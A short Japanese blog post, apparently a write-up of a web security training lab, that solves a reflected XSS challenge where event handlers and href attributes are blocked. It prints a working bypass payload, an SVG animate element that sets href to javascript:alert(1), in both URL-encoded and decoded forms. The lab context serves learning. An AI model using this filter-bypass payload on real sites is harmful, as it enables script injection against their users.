Shikata Ga Nai

Private? There is no such things.

Reflected XSS with event handlers and href attributes blockedをやってみた

Hello there, ('ω')ノ

 

イベントハンドラとhref属性がブロックされた反映XSSを。

すべてのイベントとアンカーhref属性がブロックされているとのこと。

クリックするとアラート機能を呼び出すベクトルを注入するXSSを実行せよと。

ますは、下記でURLでパラメータの確認を。

 ?search=test

 

f:id:ThisIsOne:20210222155221p:plain

 

下記を挿入せよとのことで、URLデコードして内容を確認して。

?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E

 

下記は、URLデコードした結果で。

?search=<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>

 

f:id:ThisIsOne:20210222155725p:plain


どちらのパラメータでも実行可能で。

 

f:id:ThisIsOne:20210222155654p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210222160245p:plain

 

ちなみにリクエストは、下記のとおりで。

 

f:id:ThisIsOne:20210222155918p:plain

 

2つのリクエストを比較した結果は、下記のとおりで。

 

f:id:ThisIsOne:20210222163550p:plain

 

Best regards, (^^ゞ